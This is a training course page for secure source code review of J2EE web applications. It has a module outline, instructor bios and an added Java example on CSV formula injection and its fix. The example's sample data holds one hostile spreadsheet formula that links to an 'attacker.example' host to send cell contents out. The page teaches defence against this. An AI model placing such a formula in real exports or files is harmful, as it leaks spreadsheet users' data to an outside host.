HackMiami Con 7


Secure Code Auditing

By Manoj Kumar and Ranjith Menon

Register Now!

Secure code auditing is a highly effective way of finding vulnerabilities in software. Unlike black-box
testing, it requires an in-depth analysis of the application's source code to locate security flaws.
This training is hands-on throughout: you will need to bring your own laptop to perform different types
of attacks against web-based applications and to audit the code of the J2EE demo application.

A laptop running Windows, Linux or OS X
10 GB of free disk space
VMware Player installed

Those who want to perform a manual secure code audit.
Those who have very basic knowledge of the OWASP Top 10.
Those who want to build secure applications.
Those with a basic development background.
Those who want to learn various source code review methodologies and approaches.

Exposure to different tools used for performing attacks
A J2EE-based demo application on which to perform a secure code audit

Any professional tools

Course Duration: 1 Day
The course covers the relevant J2EE-based web application issues and then demonstrates how to
design and build code defenses against them into an application.


Module 1: Secure Source Code Review(SSCR) Approaches
➢ What is SSCR
➢ Need for SSCR
➢ Different ways of doing SSCR
➢ SSCR vs Dynamic application security testing
Module 2: Input Validation
➢ Bypassing client-side validation
➢ Variable manipulation attacks
➢ Insecure Direct Object References
➢ File Upload attacks and best practices
➢ Reflected, Stored and DOM based XSS
➢ Proper implementation of OTP & CAPTCHA
➢ Best practices and guidelines to avoid these Attacks
➢ Demo
Module 3: Injection
➢ Blind & Second Order SQL injection
➢ CSV based export features using formula injection
➢ Demo
Module 4: Error Handling and Logging
➢ Proper implementation of log
➢ Proper error handling
➢ Demo
Module 5: Code Quality
➢ Language-specific configuration checks
➢ Hard-coded information
➢ Critical information in comments
➢ Client-side hard-coded information
➢ Best practices to check for unused code
➢ Demo
Module 6: Cryptography
➢ Encryption & Decryption
➢ Encoding & Decoding
➢ Hashing
➢ Salted hash technique
➢ Storage of critical information on the backend
➢ Demo
Module 7: XML External Entity (XXE) Attack
Module 8: Cross Site Request Forgery (CSRF)
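To give a feel for what a finding in this kind of audit looks like, here is an added example (written for this page; it is not course material or code from the instructors' demo application) for the Module 3 item on CSV export and formula injection. A reviewer traces a user-controlled string from storage into a CSV export; if it is written verbatim, a value beginning with `=`, `+`, `-` or `@` is evaluated as a formula when the file is opened in a spreadsheet. The class name, method names and the sample row are all constructed for illustration.

```java
import java.util.Arrays;
import java.util.List;

/**
 * Added example, not part of the course: a CSV export feature as seen
 * during a secure source code review. The vulnerable method writes
 * user-controlled values verbatim; the hardened one neutralises formula
 * triggers and applies RFC 4180 quoting.
 */
public class CsvExportReview {

    // Constructed sample row: the third cell is attacker-controlled input that
    // was accepted by the application and stored in the database.
    static final List<String> SAMPLE_ROW = Arrays.asList(
            "1001", "Alice", "=HYPERLINK(\"http://attacker.example/?\"&A1,\"click\")");

    /** Vulnerable: values are joined with no escaping. This is what the reviewer flags. */
    static String exportRowVulnerable(List<String> cells) {
        return String.join(",", cells);
    }

    /**
     * Hardened cell encoder. A leading apostrophe forces spreadsheets to treat
     * the cell as text; tab and carriage return are included because some
     * spreadsheet applications also interpret cells starting with them.
     * The field is then quoted, with embedded quotes doubled, so commas and
     * line breaks inside the value cannot break the row structure.
     */
    static String escapeCell(String value) {
        if (value == null) {
            return "\"\"";
        }
        String v = value;
        if (!v.isEmpty()) {
            char c = v.charAt(0);
            if (c == '=' || c == '+' || c == '-' || c == '@' || c == '\t' || c == '\r') {
                v = "'" + v;
            }
        }
        return "\"" + v.replace("\"", "\"\"") + "\"";
    }

    /** Hardened: every cell goes through escapeCell before being joined. */
    static String exportRowHardened(List<String> cells) {
        StringBuilder sb = new StringBuilder();
        for (int i = 0; i < cells.size(); i++) {
            if (i > 0) {
                sb.append(',');
            }
            sb.append(escapeCell(cells.get(i)));
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        System.out.println("vulnerable: " + exportRowVulnerable(SAMPLE_ROW));
        System.out.println("hardened:   " + exportRowHardened(SAMPLE_ROW));
    }
}
```

The trade-off a reviewer should note when recommending this fix: legitimately negative numbers such as `-1` also receive the apostrophe prefix and will appear as text, so the export code should apply the prefix only to columns that carry free-form user input, or format numeric columns separately.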


About Manoj Kumar and Ranjith Menon

Manoj Kumar has more than 6 years of experience in application security and the secure coding process, and is a co-founder of h1hakz. He has developed many secure application projects in different languages and has code-reviewed a wide range of applications, from embedded systems to web applications, including retail banking and e-commerce applications.

Handle: @cysmanojsah, @h1hakz


Ranjith Menon has more than 8 years of experience. He is an active participant in bug bounty programs, specializes in web application, mobile and cloud security, and is a contributor to the security community and a co-founder of h1hakz, an open platform for knowledge sharing through a webcast series. He has found many vulnerabilities for many organizations. Apart from hacking, he makes time for fitness in his work schedule.

Handle: @ranjith_menon16, @h1hakz


For more information: